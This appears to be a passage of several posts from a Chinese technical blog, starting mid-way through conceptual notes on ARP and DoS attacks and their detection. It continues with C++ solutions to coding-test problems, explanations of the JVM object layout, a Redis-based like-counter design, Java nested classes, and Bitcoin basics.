01-00-5e-00-00-fc     静态  239.255.255.250       01-00-5e-7f-ff-fa     静态  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

攻击防御方法

1. 减少ARP缓存过期时间
2. 建立静态ARP表
3. 禁止ARP，适用于小型网络

DoS攻击

全称Denial of Service ，拒绝服务攻击。具体类型

• Ping Of Death攻击, 使用基于ICMP的ping工具来请求目标服务器，以消耗目标服务器资源。（在ICMP报文增加非常多的冗余信息，从而使得接收方对这种舒适堡处理的时候就会出现内存分配错误发，导致TCP/IP堆栈溢出，从而引起系统崩溃）
• Land攻击，发送一个TCP封包（源地址和目的地址都是某一个服务器），将会导致服务器向自己发送一个SYN-ACK消息，无限循环，直到超时。
• SYN洪水，攻击者伪造IP，只给服务器发送一个SYN包，而不去进行第三次握手过程，这样目标服务器的TCP连接处于半连接状态，消耗目标服务器资源。
• Smurf：讲源地址伪造成被攻击方IP，然后广播ICMP Echo请求，这样被攻击方就会被ICMP Echo-Reply应答淹没。
• HTTP 洪水，HTTP GET FLOOP针对应用服务器的某个文件，对其进行快速反复读取操作，从而造成服务器资源减少直到崩溃。
• CC攻击，攻击者控制肉鸡攻击，使用代理服务器向受害者服务器发送大量貌似合法的请求。

DOS检测：

• 基于误用地DDoS检测，事先收集已有DDoS攻击地各种特征，然后将当前网络中数据包特征和各种攻击特征相互比较，如果特征匹配则发现DDoS攻击，（事前预防）
  • 特征匹配
  • 模型推理
  • 状态转换
  • 专家系统
• 基于异常的DDoS检测：通过监视系统审计记录上异常使用地异常情况，可以检测出违反安全地时间，目前，大多数地DDoS攻击检测都属于异常检测。
  • 统计检测
  • 模式预测
  • 人工智能检测
  • 机器学习检测
• 混合模式DDoS检测：由异常检测发现攻击，从发现的攻击中摘录特征放入误用模式特征库中，再1误用检测地方法来检测DDoS攻击。

1. 字符串修改

输入： 一个字符串S

任意一个字符串，修改字符，如何才能使得修改后的字符串不包含两个连续相同的字符？模拟即可

#include <bits/stdc++.h>using namespace std;typedef long long ll;typedef unsigned long long ull;#define ms(s,val) memset(s, val, sizeof(s))const int inf = INT_MAX;int T;int main(int argc, char * argv[]){string s;cin >> s;int n = s.size();int ans = 0;    // 判断当前字符和上一字符是否相等，如果不相等，可以暂时修改为"+"for(int i = 1; i < n; i++){if(s[i] == s[i-1]){s[i] = '+';ans++;}}cout << ans;    return 0;}

2. 最优规划

输入：

1. 第一行 n， m， k 分别代表行数、列数和颜色转换需要的金币数
2. 输入 colors颜色二维数组
3. 输入金币二维数组代表每点的金币个数

动态规划即可，
dp[i][j]代表到达 (i,j) 最大的价值，转移方程也就不难推出了。
需要注意的是

1. 上一步(i-1,j) or (i, j-1)是否可以到达（如果为-1那么就是不可达）
2. 如果上一步到此步有颜色转换，那么上一步是否可以移动到此位置也就是dp[i-1][j] or dp[i][j-1] >= k

#include <bits/stdc++.h>using namespace std;typedef long long ll;typedef unsigned long long ull;#define ms(s,val) memset(s, val, sizeof(s))const int inf = INT_MAX;int T, n, m, k;const int MAXN = 200;int coins[MAXN][MAXN];char colors[MAXN][MAXN];int main(int argc, char * argv[]){cin >> n >> m >> k;for(int i = 0; i < n; i++) for(int j = 0; j < m; j++) cin >> colors[i][j];for(int i = 0; i < n; i++) for(int j = 0; j < m; j++) cin >> coins[i][j];int dp[MAXN][MAXN];memset(dp, 0, sizeof(dp));int ans = 0;dp[0][0] = 0;for(int i = 0; i < n; i++){for(int j = 0; j < m; j++){if(i or j) dp[i][j] = -1;else continue;            // 需要注意 1. 上一步是否可以到达（如果为-1那么就是不可达） 2.如果有颜色转换，上一步是否可以移动到此位置也就是是否大于等于Kif(i > 0 and dp[i-1][j] >= 0){if(colors[i-1][j] == colors[i][j]) dp[i][j] = max(dp[i][j], dp[i-1][j] + coins[i][j]);else if(dp[i-1][j] >= k) dp[i][j] = max(dp[i][j], dp[i-1][j] + coins[i][j] - k);}// dp[i][j] = -1;if(j > 0 and dp[i][j-1] >= 0){if(colors[i][j-1] == colors[i][j]) dp[i][j] = max(dp[i][j], dp[i][j-1] + coins[i][j]);else if(dp[i][j-1] >= k) dp[i][j] = max(dp[i][j], dp[i][j-1] + coins[i][j] - k);}ans = max(ans, dp[i][j]);}}cout << ans;    return 0;}

3. 区间覆盖最大次数

输入 ：
第一行： n 代表区间个数
第二行， 输入所有区间的起始端点
第三行， 输入所有区间的末尾端点

使用差分数组, 插入[from, to]区间的时候，使得mp[from]++, mp[to+1]--, 然后再通过前缀求和，就可以得到每个点的覆盖次数。需要注意的是 1^9+10的数据情况下，我们不能模拟全部点，应该只保存端点，因此应该使用散列表。

#include <bits/stdc++.h>using namespace std;typedef long long ll;typedef unsigned long long ull;#define ms(s,val) memset(s, val, sizeof(s))const int inf = INT_MAX;int T;const int MAXN = 1e5 + 10;int from[MAXN], to[MAXN], n;int main(int argc, char * argv[]){map<int, int> mp;cin >> n;for(int i = 0; i < n; i++) cin >> from[i];for(int i = 0; i < n; i++) cin >> to[i];for(int i = 0; i < n; i++){mp[from[i]]++;mp[to[i] + 1]--;}int max_count = 0;int count = 0;vector<pair<int,int>> p;for(auto it : mp){count += it.second;max_count = max(count, max_count);p.push_back({it.first, count});}int ans = 0;    //如果从某一端点开始可以取得最大值，那么此段点到下一端点范围的点都满足题意for(int i = 0; i < p.size(); i++){if(p[i].second == max_count){ans += p[i+1].first - p[i].first;}}cout << max_count << " " << ans;    return 0;}

4. 坦克大战

大模拟即可，题目挺复杂的，也忘记截图保存学习了，此题只过了82%。

感谢@hammer 提供的题目简要概括：

@hammer : 坦克大战题目应该是出自知乎，除了子弹速度不一样 https://zhuanlan.zhihu.com/p/575687028

#include <bits/stdc++.h>using namespace std;typedef long long ll;typedef unsigned long long ull;#define ms(s,val) memset(s, val, sizeof(s))const int inf = INT_MAX;int T;int flag[16][16]; //0 未被占领  1 2 分别占领unordered_map<char,int> xx;unordered_map<char,int> yy;unordered_map<char, int> hh;string s, t;bool checkMove(char ch){return ch == 'U' or ch == 'D' or ch == 'L' or ch == 'R';}int main(int argc, char * argv[]){cin >> s >> t;xx['U'] = -1, xx['D'] = 1, xx['L'] = xx['R'] = 0;yy['L'] = -1, yy['R'] = 1, yy['D'] = yy['U'] = 0;int n = s.size();    //代表位置int x1 = 0, y1 = 0, x2 = 15, y2 = 15;    //代表朝向int h1 = 'R', h2 = 'L';    // a ： 代表经过几轮结束游戏 b: 结局情况    // b= 0：未定； 1：D胜,  2: W胜， 3：平局int a = n - 1, b = 0;flag[0][0] = 1, flag[15][15] = 2;for(int i = 0; i < 256; i++){int cx1 = x1, cy1 = y1, cx2 = x2, cy2 = y2;//判断是否能否被摧毁bool at1 = false, at2 = false;if(not checkMove(s[i])){if(h1 == 'U' and y1 == y2 and x2 < x1){ a = i, b = 1; at1 = true;}if(h1 == 'R' and x1 == x2 and y2 > y1){ a = i, b = 1; at1 = true;}if(h1 == 'D' and y1 == y2 and x2 > x1){ a = i, b = 1; at1 = true;}if(h1 == 'L' and x1 == x2 and y2 < y1){ a = i, b = 1; at1 = true;}}if(not checkMove(t[i])){if(h2 == 'U' and y1 == y2 and x2 > x1){ a = i, b = 2; at2 = true;}if(h2 == 'R' and x1 == x2 and y2 < y1){ a = i, b = 2; at2 = true;}if(h2 == 'D' and y1 == y2 and x2 < x1){ a = i, b = 2; at2 = true;}if(h2 == 'L' and x1 == x2 and y2 > y1){ a = i, b = 2; at2 = true;}}        //如果可以相互摧毁，那么平局if(at1 or at2){if(at1 and at2) a = i, b = 3;break;}cx1 = x1 + xx[s[i]], cy1 = y1 + yy[s[i]];cx2 = x2 + xx[t[i]], cy2 = y2 + yy[t[i]];//相撞，平局if(cx1 == cx2 and cy1 == cy2 and flag[cx1][cy1] == 0){a = i;b = 3;break;}        //尝试改变位置if(checkMove(s[i])){h1 = s[i];if(flag[cx1][cy1] != 2) flag[cx1][cy1] = 1, x1 = cx1, y1 = cy1; }if(checkMove(t[i])){h2 = t[i];if(flag[cx2][cy2] != 1) flag[cx2][cy2] = 2, x2 = cx2, y2 = cy2; }}//前面未定胜负，查看占领区域数量if(b == 0){int cnt1 = 0, cnt2 = 0;for(int i = 0; i < 16; i++){for(int j = 0; j < 16; j++){if(flag[i][j] == 1) cnt1++;if(flag[i][j] == 2) cnt2++;}}if(cnt1 > cnt2) b = 1;else if(cnt1 < cnt2) b = 2;else b = 3;a = n - 1;}if(b == 1) cout << a + 1 << endl << "D" << endl;else if(b == 2) cout << a + 1 << endl  << "W" << endl;else cout << a + 1 << endl  << "P" <<endl;    return 0;}

5. 平衡节点个数

给你一个数组，然后里面存储的每个节点的父节点编号，以及每个节点的颜色（R或者B），问这棵树中所有平衡节点的个数？平衡节点的意思是指：该节点和该节点的所有子树的两种颜色的节点个数相同。

首先根据题意构造出原来多叉树，然后递归求解每个节点左右子树的颜色总数平衡即可，力扣有大量这种题目。
注意，由于一直在调第四题，所以这道题没有a完就提交了，也没看过了多少样例，听同学说是多叉树，么看清题意。但是思路应该都差不多，所以该题代码仅供参考叭~

#include <bits/stdc++.h>using namespace std;typedef long long ll;typedef unsigned long long ull;#define ms(s,val) memset(s, val, sizeof(s))const int inf = INT_MAX;struct Node{int val;int color;Node *left;Node *right;Node(int _color){this->color = _color;left = nullptr;right = nullptr;}};int T;// unordered_map<Node*, pair<int,int>> mp;const int MAXN = 100001;unordered_map<int, Node*> mp;int ans = 0;pair<int,int> cal(Node* node){if(not node) return {0, 0};auto leftHave = cal(node->left);auto righthave = cal(node->right);int R = leftHave.first + righthave.first + (node->color == 0);int L = leftHave.second + righthave.second + (node->color == 1);cout << R << L << endl;if(R == L) ans++;return make_pair(R, L); }void print(Node* root){if(not root) return;print(root->left);cout << root->color;print(root->right);}int main(int argc, char * argv[]){int n;cin >> n;string color; cin >> color;vector<Node*> s(n + 1);for(int i = 1; i <= n; i++){int c = color[i-1] == 'R' ? 0 : 1;s[i] = new Node(c);}int father;for(int i = 2; i <= n; i++) {cin >> father;if(not s[father]->left) s[father]->left = s[i];else s[father]->right = s[i];}ans = 0;cal(s[1]);cout << ans;    return 0;}

如有纰漏，还请评论指正 欢迎关注此小站 https://tans.fun ~ 如果有问题，可以评论，
建议注明正确的邮箱，这样可以邮箱给您回复

注：该贴题目以及答案仅供学习参考使用，如有侵权请联系博主删除。

相关阅读

1. 记录一次美团面试
2. 2022-4-14携程笔试
3. 2022-4-24腾讯技术后端场笔试
4. 2022京东春招笔试4-2
5. 腾讯音乐笔试2022-4-7场
6. 2022-4-14携程笔试

在HotSpot虚拟机里，对象在内存中的存储布局可以划分为三个部分：对象头(header)、实例数据（Instance Data）和对齐填充（Padding）,如图所示：

各部分作用

一、Header（对象头）

Header是 对象结构的第一部分，通常包括实例对象的Markword、类元指针、长度字段（如果是数组对象）。同时在64位和32位操作系统下，他们占用的空间也不一样，下面我们逐一介绍：

1. Markword

主要包括锁信息、Hashcode、GC年龄、锁状态标志、线程持有的锁、偏向线程的ID、偏向时间戳等等。特别的，这一部分和Java中的锁息息相关。同时在Markword中，为了使得空间利用最大化，Hotspot采用不同的标志位来代表当前对象处于不同的状态，并且代表不同的数据解读方式。

例如32位Java虚拟机中的Markword格式：

同时，下图是64位虚拟机中Markword格式，注意，64位Java虚拟机中的Markword占用8byte：

2. Klass Pointer

类型指针，这里指向类型元数据的指针，JVM通过该指针确定该对象是哪个类的实例。其中，32位JVM为32位，64位JVM为64位，同时，在64位系统中，可以开启JVM类型压缩参数-XX:-UseCompressedOops来启用指针压缩。通过下图可以看到，虚拟机通过这个指针指向方法区的Klass对象：

3. Length（可选）

此部分只在对象类型是数组类型的情况下使用，该字段表明数组的长度。如果开启+UseCompressedOops选项，该区域长度也将由64位压缩至32位。

二、Instance Data（实例数据）

这一部分存储对象真正有效的信息，也就是程序代码里面定义的各种类型的字段。无论是从父类继承下来的，还是子类定义的都将存放在此部分。一个实例对象中通常包含多个引用型和基本数据类型变量，它们在的JVM中分配的顺序遵循以下规则：

• 默认按照类型，longs/doubles、ints、shorts/chars、bytes/booleans、oops（Ordinary Object Pointers，OOPs）进行排序分配
• 在满足上述条件情况下，父类定义的变量会出现在子类之前。也可以使用一些参数来进行优化，例如：

#相关参数+XX：CompactFields #子类之中较窄的变量也允许插入父类变量的空 隙之中，以节省出一点点空间。默认true

三、Padding（对齐填充）

第三部分是对齐填充，这并不是必然存在的，也没有特别的含义，它仅仅起着占位符的作用。由于HotSpot虚拟机的自动内存管理系统要求对象起始地址必须是8字节的整数倍，换句话说就是任何对象的大小都必须是8字节的整数倍。对象头部分已经被精心设计成正好是8字节的倍数（1倍或者2倍），因此，如果对象实例数据部分没有对齐的话，就需要通过对齐填充来补全。对齐填充的思想在很多领域都有用到，例如TCP报文段等等。在JVM中，对齐填充也是指针压缩压缩的前提，下面我们会深入分析。

疑问解答

1. new Object()产生的对象会占用多大内存？

首先我们要搞清楚JVM虚拟机是多少位？以64位为例：

• Header
  • Markword : 8 byte （如果是32位系统，这里占用4 byte)
  • Klass Pointer : 4 byte （默认开启指针压缩）
• Instance Data: 0 byte
• Padding : 4 byte （对象填充 8 byte 整数倍）

故在64位操作系统环境下共占用 16 byte。

2. 为什么需要指针压缩技术

在Klass Pointer中，我们提到了指针压缩技术，那么为什么需要这一项技术呢？ 对比开启指针压缩前后，会发现64位操作系统下，原来实例指针大小从原来的 8byte 压缩到了 4 byte, 这样以来，我们的实例对象头所占用的堆空间就减小了，不仅节约了堆空间，也可以缓解GC压力。JVM在1.6以后默认启用指针压缩功能。

 #指针压缩的相关参数 -XX:+UseCompressedOops           #默认开启的压缩所有指针 -XX:+UseCompressedClassPointers  #默认开启的压缩对象头里的类型指针Klass Pointer

3. 开启指针压缩，那么压缩后的指针是如何在64位操作系统寻址的？

首先容易理解的是，按字节编址，那么32 bit最多寻址的单元是4GB ，而JVM采用了对象填充这一特性，也就是最少分配单元是8B, 那么我们就无需记录实例对象的真实内存地址，而是使用压缩编码的方式来确定其在第几个8B, 因此我们的 32bit就可以寻址 2^32 * 8B = 32GB地址。因此压缩编码只有在JVM堆内存在32GB以下是有效的，得出结论：

• 当堆内存小于4G时，不需要启用指针压缩，jvm会直接去除高32位地址，即使用低虚拟地址空间
• 当堆内存大于32G时，压缩指针会失效，会强制使用64位(即8字节)来对java对象寻址， 那这样的话内存占用较大，GC压力等等

因此，在64位操作系统下，JVM的堆内存最好不要超过32GB，因为可能会导致指针压缩功能失效。

总结

本文中，首先解释了JVM实例对象在堆内存中的存储结构分别为：

1. Header
   1. Markword
   2. Kclass Pointer
   3. Length
2. Instance Data
3. Padding

其中，在不同操作系统环境的的JVM中，字段大小有些差异。接着，我们着重分析了指针压缩这项技术所带来的好处以及其实现原理。同时也对Markword这一字段做了深入了解，可以看出 JVM团队在具体实现中在内存占用方面和性能方面所做的非常巧妙的设计和优化。

参考资料

1. 对象压缩
2. 对象压缩实现
3. Java对象头详解
4. Markword源码
5. 《深入理解JVM虚拟机》. 周志明. 2.3.2
6. JVM - 剖析Java对象头Object Header之指针压缩
7. Java对象内存布局和对象头

前置知识：Mysql 5.6 、RabbitMq 3.11.8 、Redis 7.0.8 底层数据结构

最近在实现一个点赞接口，简单的来说就是用户对一个视频点赞后，会产生点赞信息，并且将视频点赞计数器加1，整体设计思路以及设计过程如下：

基于Mysql的计数器

首先我们要设计两张Mysql表

• 点赞关系表 like_record：

  字段名称	类型	意义
  id	bigint	点赞用户ID
  user_id	bigint	用户ID
  video_id	bigint	视频ID
  is_del	bool	是否删除 软删除
  update_at	timestamp	更新时间

• 点赞计数表 video_counter

  字段名称	类型	意义
  video_id	bigint	视频ID
  like_count	bigint	喜欢计数器
  forward_count	bigint	转发计数器
  comment_count	bigint	评论计数器

具体业务逻辑是

• 点赞的时候，插入like_record并且更新video_counter计数器。
• 取消点赞的时候，
  • 如果like_record存在相关记录，那么直接更新is_del = 1，并且更新video_counter计数器
  • 如果不存在相关记录，那么直接在like_record插入相关数据，并且更新video_counter计数器

可以看到进行一次点赞请求，我们需要两次操作数据库操作。因此耗时比较多。

优缺点分析

1. 点赞属于用户无意识行为，频率较大，所以在高并发场景下，仅仅通过数据库不可能扛得住的
2. video_counter表在需要拓展其他计数器的时候，可能需要修改表结构，扩展能力不足

基于Redis计数器

在单独用Mysql来实现的讨论中，发现对于点赞技术的查询、修改都是在数据库中进行，这就意味着要和磁盘打交道了，对于CPU来说这是一个灾难。需要注意的是不同于其他地方的缓存策略，计数器的修改和查询必须在缓存中操作，也就是计数器数据在缓存中操作，而非DB层

Version 1 (Fast)

为了解决点赞操作缓慢这个问题，在version 1中，考虑将视频的点赞信息放到缓存中，同时点赞的计数操作可以直接在内存中进行+1 or -1操作，也就是在缓存中做一个计数器。

那可能会有同学问了，

• Cache中的数据是易失的，突然宕机了怎么办？在这里Redis的持久化机制就派上用场了，可以手动开启RDB和AOF两种持久化机制。
• DB中记录点赞关系表，Cache中记录点赞总数，如果不一致怎么办？这个稍后再讨论，毕竟这是小概率问题。

好了解决了缓存实现中的一些疑问点，现在着手设计叭！

首先要在Redis中为每个视频设置一个计数器，我们将KEY设计为

• counter:video_id:like ：代表视频点赞数，其中video_id需要替换成具体视频ID
• counter:video_id:comment：代表视频评论数，其中video_id需要替换成具体视频ID
• counter:video_id:forward：代表视频转发数，其中video_id需要替换成具体视频ID

VALUE设计成普通的INT编码的String对象，具体操作是这样的：

set counter:1:like 1 #设置计数器incr counter:1:like #点赞计数器加一decr counter:1:like #点赞计数器减一

到这，来捋一下具体一个操作逻辑：

1. 点赞请求

2. 查询点赞数数：

Version 2 （Asyn）

对于Version 1，我们发现在点赞视频的时候，还是会操作数据库，而且在数据库和缓存的数据，不太需要强一致性，因此可考虑做异步处理，也就是文首提到的RabbitMQ

系统只需要更新Redis计数器中的值，然后将入库操作发送到MQ中，起到了异步请求和削峰填谷的作用。又一个进程来充当消费者对

关于缓存和数据库的数据不一致情况，可以在用户量的时候设置一个定时任务做同步处理：

Version 3 (Smaller Space)

简单分析

以上我们简单实现了基于Redis和MQ的点赞计数器，当时内存容量通常来说是远远小于磁盘的。如何物尽其用，降低成本呢？接下来我们着重解决内存占用问题。

如果采用Version 1中方案，我们为每个视频设置4个计数器，需要$4$个键值对，在Redis中，K-V对都是由String对象类型表示，Redis对象结构在Redis中表示如下： Redis底层实现

typedef struct redisObject{     //类型     unsigned type; //4bit     //编码     unsigned encoding; //4bit     //对象空转时长:记录了对象最后一次命令程序访问的时间     //可以配合回收算法进行allkeys-lru volatile-lru使用     unsigned lru; //24bit     //指向底层数据结构的指针     void *ptr; //64位操作系统占用8B     //引用计数     int refcount; //4B     //....}robj;

• 计数器的Value值的是整数值（long类型），所以其默认底层编码是REDIS_ENCODING_INT，因此具体存储结构如下：也就是ptr指针直接被换成了我们要存储的整型值

  因此对于计数器的值存储，共占用 (4bit+4bit+24bit)/8(type lru encode) + 4B(refcount) + 8B(ptr) = 16B

  

• 计数器的Key值是字符串，且不超过32字节，所以其默认底层编码是REDIS_ENCODING_RAW，因此具体存储结构如下：也就是ptr指针直接被换成了我们要存储的SDS结构体

  typedef char *sds;struct sdshdr {    unsigned int len; //4B    unsigned int free; //4B    char buf[]; //字符串长度 + 1};

  因此具体存储结构为：

对于计数器的键counter:1:like存储，共占用 (4bit(type)+4bit(lru)+24bit(encoding))/8 + 4B(refcount) + 8B(ptr) + (4B(len) + 4B(free) + (26B)(SDS)= 50B

因此set counter:99999999999:like 1共占用 50B + 16B = 66B，如果为单个视频设置$4$个计数器，那么一个视频的计数器占用了4 * 66 = 264B, 假设64位系统为Redis分配4GB内存，可以存储 4 * 1024 * 1024 / 264 = 15887个视频计数器。对于视频来说远不止这个数，可以说占用是非常大的。因此需要想办法使用一些办法实现这个计数器：

优化：这里采用一种方法：采用Hash对象来存储我们的值，Hash对象的编码方式有ziplist 和 hashtable，其中ziplist就是为了节约空间而设计的。

底层结构初识

先来分析一下ziplist编码下的hash对象基本结构：

Hash使用 ziplist 编码的要求是

• 所有键值对的长度都小于64B
• Hash保存的键值对的数量小于512；不能满足这两个条件使用hashtable编码

• zlbytes 压缩列表占用字节数 占用 4B
• zltail 压缩列表末尾距首部多少字节 占用 4B
• zllen 压缩列表包含的节点数目 占用2B
• zlend 标记末尾 占用 1B

再来分析一下 Zentry

• previous_entry_length 标记前一个节点的长度， 为 1B
• encoding 记录节点的编码格式， 为 1B
• content 记录内容，因为计数存储的是int64_t类型， 所以占用8B， 或者是int16_t类型，占用2B

优化思路

当我们要为 video_id 为 counter:like:9999999999 设置计数为 countNum的时候

1. 首先提取是存在Redis中的Hash对象的Key，为将 key = video_id & 0x01FF
2. 然后提取出Hash键值对Map中的Counter Key为counterkey = video_id >> 9
3. 执行 hset key counterkey countNum

注：上面的 key 计算过程就是取最低9位，因为为了保证Hash由ziplist编码，所以一个Hash Key不能超过hash-max- ziplist-entries配置。该配置默认是 512， 也就是存储 512个键值对情况下，采用ziplist编码，该值也可以在配置文件配置。

性能对比

注：分析 set counter:like:99999999999 9999999999 总共占用多少内存？

由于一个Hash数据类型 最多保存512个键值对才能满足ziplist编码，所以下面以512个counter分析：

• HashKey是采用SDS存储的字符串对象: 8B(object ptr) + 4B(lru and encoding) + 4B (ref count) + 4B(sds_free) + 4B(sds_len) + 4B(buf) = 16B + 9B + 21B = 47B

• Counter Key由Entry结构存储，占用: 1B(previous_entry_length) + 1B(encoding) + 2B(content int_16) = 4B

• Counter Value 由Entry结构存储，占用: 1B(previous_entry_length) + 1B(encoding) + 8B(content int_64) = 4B = 10B

因此一个键值对占用 14B， 512个键值对占用 7168B， 加上压缩列表的其他占用共 7168B + 11B(zllen + zlbytes + ztail + zend) = 7179B 因此，共使用47B + 7179B = 7226B保存了512个Counter ; 则单个视频设置4个Counter的情况下，4GB内存可保存的视频数为：4 * 1024 * 1024 / 7226 * 512 / 4 = 74,297, 相对于原始存储，存储效率提升了接近74297 / 15887 = 4.6倍！

总结

本篇文章首先讨论了基于Mysql的点赞计数器实现所带来的弊端，随后提出了基于Redis实现的点赞计数器，又在此基础上从以下两个方面进行深入探究：

• 性能方面，将计数逻辑在Redis中使用lua脚本实现，而入库操作使用RabbitMQ进行异步处理。其中带来的缓存一致性问题用定时器解决。经过测试，该接口单机环境下TPS可达1800+!
• 空间方面，通过分析使用基于SDS以及INT编码下的String对象类型记录每个Counter，与使用基于ziplist编码下的Hash对象进行对比，通过简单计算得出4GB内存条件下两者的内存占用，最终得出后者的存储效率提升了近$4.6$倍！

可以看到，点赞接口作为一个项目中的小功能，无论是架构上还是实现上，无论是从性能上或者空间占用上，其实都有着许多要值得深究的地方，这不仅会带来用户体验的提升，更是对生产成本的巨大节约。当然这需要对技术深入了解和探索，这一点笔者还在努力！如果纰漏，还请指正！

参考资料

1. https://kernelmaker.github.io/Redis-StringMem
2. Redis设计与实现 黄健宏
3. Redis 5 设计与源码分析
4. 来聊聊Redis底层数据结构叭

一、概念

前几天面试过程中遇到了一个关于匿名内部类的问题，当时不太明白，现在着重理解一下。甲骨文官方释意：

Nested classes are divided into two categories: non-static and static. Non-static nested classes are called inner classes. Nested classes that are declared static are called static nested classes.

1. 普通内部类（Inner Class）

内部类（Inner）就是放在另外一个类的内部定义的类。通常它这样写

class OuterClass {    ...    class InnerClass {        ...    }}

1. 内部类可以访问并且修改外部类的private字段，例如

class Outer{    private String info = "hello, i'm info";    class Inner{        public void run(){            System.out.println("hello, i'm inner");             //修改外部类的private字段            info = "hello, i have changed by inner class method";             //Outer.this.info = "hello, i have changed by inner class method";            System.out.println(info);        }    }}public class Test {    public static void main(String[] args) {        Outer outer = new Outer();        Outer.Inner inner = outer.new Inner();        inner.run();    }}// Result:/**hello, i'm innerhello, i have changed by inner class method**/

2. 在内部类中，由于内部类实例依附于外部类实例，为了区分两者的同名属性，通常用this指代当前内部类实例本身，而通过Outer.this指代外部类实例，例如：

class Outer{    private String info = "hello, i'm out";    class Inner{        private String info = "hello i'm inner";        public void run(){            System.out.println(this.info); //this 指向            Outer.this.info = "hello, i have changed by inner class method";            System.out.println(Outer.this.info);        }    }}public class Test {    public static void main(String[] args) {        Outer outer = new Outer();        Outer.Inner inner = outer.new Inner();        inner.run();    }}// result:/**hello i'm innerhello, i have changed by inner class method**/

另外，有两种特殊的Inner classed ，分别为local classes 和 anonymous classes 具体可看special inner class

2. 静态嵌套类（Static Nested Class）

在内部类中，也可以用static修饰内部类，我们称之为Static Nested Class静态内部类， 例如ThreadLocal中：

public class ThreadLocal<T> {     //....     static class ThreadLocalMap {     }}

一个有趣的事情是：Oracle官方将普通内部类称作Inner Classes, 而将静态嵌套类称作Nested Class, 嵌套就是你我毫不相干，所以静态内部类不依附于外部类实例，所以可以作为一个独立的类存在,而且它可以访问外部类private修饰过的静态字段和静态方法，如果将其移动到外部，那么就失去了这种效果

class A {    static private int a1 = 1;    private int a2 = 2;    static class B{        public static void say(){            System.out.println(a1); //right result : 1            System.out.println(a2); //wrong 不可访问外部非静态对象        }    }    public static void main(String[] args) {    }}public class Test{    public static void main(String[] args) {        A.B.say(); //调用正确        new A.B().say(); //调用正确    }}

二、作用

1. 实现多继承

由于Java支持单继承，但是我们可以通过匿名内部类来实现多继承，例如：

class dad {    public String body(){        return "I have strong body";    }}class mom {    public String hair(){        return "I have black hair";    }}//实现了多重继承class Son{    private class test1 extends dad {        @Override        public String body() {            return "I have stronger body";        }    }    private class test2 extends mom {        @Override        public String hair() {            return "I have more black hair";        }    }    public String getInfo(){        return new test1().body() + " and " +  new test2().hair();    }}//Result/**I have stronger body and I have more black hair**/ 

三、总结

• 嵌套类包括Inner classes (内部类)和 static nested classes（静态内部类）
• 其中Inner classes又包括simple inner class、local classes and anonymous classes
• 内部类优点：
  • 如果一个子类只被外部类自己使用，那么就没有必要将内部类变成top-level classes, 通过添加这样的“辅助类”可以使包结构变得简洁干练
  • 增加了封装，考虑两个顶级类A和B，其中B需要访问A的成员，通过将类B隐藏在类A中，可以将A的成员声明为私有，B可以访问它们。此外，B本身可以对外界隐藏。
  • 代码可读性和可维护性增加：嵌套类的代码和外部类的代码距离变得更近。

四、参考资料

1. Oracle Nested Classes
2. 为什么Java内部类要设计成静态和非静态两种？

Bitcoin基础概念

区块链 = 区块 + 链

区块（Block）

首先需要了解一下区块的头部字段值含义：

• Prev Hash: 前一个块的 $Hash$值， 如果是创世块，则为 00000....00000
• Merkle Hash: 将一系列交易数据通过简单的算法变成一个汇总的 $Hash$
• Block Hash: 区块哈希，一个区块的哈希没有记录在头部，而是对头部哈希，作为下一个块的Prev Hash值
• Nonce : 搭配POW，矿工通过不断猜测其值来使头部$Hash$值（两次SHA256）的前缀达到几个$0$

链（Chain）

可以发现，cur_block通过头部的prev hash来找到上一区块，进而找到第一个区块，我们把第一个区块称作创世块

如果攻击者想修改账本，例如如下图：

如果要篡改2号块的信息，那么他需要修改3号块的prev hash，但是这又会导致 3号块的block hash改变，因此他又需要修改4号块的prev hash，以此类推…. 也就是他需要修改被篡改块的后继所有区块，但是由于采用**工作量证明(POW)**的方式来进行进行记账，这意味他需要掌握全网51%的算力才行。

交易

在比特币的世界中，假如 A 向 B 交易 2个比特币，那么中间的两个问题：

• 怎么确定A有没有 2个比特币？ 这个好验证，大家一直查帐本呀，造不了假
• 怎么确定这个是A发的？ 这就需要使用类似证书的公钥+私钥来解决了

私钥SK自己保存，通过私钥生成公钥PK（银行卡号），注意这个过程不可逆转。

即 ： 公钥—– X —–>私钥 ； 私钥 ———-–> 公钥

A发送消息的时候，用私钥对信息进行签名，然后将公钥和签名消息发送给别人，那么接收方可以用公钥对信息解密验证，如果验证成功，那么就是成立的，大家也都认同这个转账消息。

挖矿原理

那么交易信息谁来记录呢？也就是谁来记账呢，也就是谁来打包新的区块并且接到前一个区块呢？

总不能白白干事吧，官方宣布：谁能记一笔账谁就有一笔奖金（bitcoin）~ ， 这时候大家都踊跃报名成为记账者，那么产生有竞争，那么就必须挑选一名幸运儿记账了，怎么挑选呢？比特币使用了工作量证明(POW)，具体原理：

• 用户打包好最近比特世界的交易记录，做成一个区块
• 不断尝试修改区块头部的Nonce字段，使得整个头部的哈希值前缀有X个0（X是官方规定的）
• 谁先尝试出来，那么就说明算力运气好。（这也解释了为什么会出现显卡难潮）

POW被称作共识机制，当然也有PoS共识机制，为了避免浪费计算机资源，通过保证金来对赌一个合法的块成为新区块，恶意参与者会没收其保证金，进而损失经济经济利益。这种全网1/3的资源才能左右最终结果

以太坊

待更新……

参考资料

1. 廖雪峰的官方网站
2. 区块链技术指南